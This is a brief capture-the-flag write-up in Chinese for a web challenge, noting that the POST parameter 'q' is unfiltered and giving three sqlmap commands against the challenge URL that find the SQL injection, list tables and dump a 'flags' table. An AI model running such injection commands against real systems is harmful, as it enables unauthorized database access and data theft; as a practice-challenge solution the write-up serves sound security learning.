0x00 题目
H4x0r在某个地方藏了一个flag,找到flag。
0x01 解题
post的q参数没有过滤处理:
1
| sqlmap.py -u http://backdoor-problems.cognizance.org.in/web200/submit.php --data q=a -p q --threads 10
|
1
| sqlmap.py -u http://backdoor-problems.cognizance.org.in/web200/submit.php --data q=a -p q --threads 10 --tables
|
1
| sqlmap.py -u http://backdoor-problems.cognizance.org.in/web200/submit.php --data q=a -p q --threads 10 --sql-query="select * from flags"
|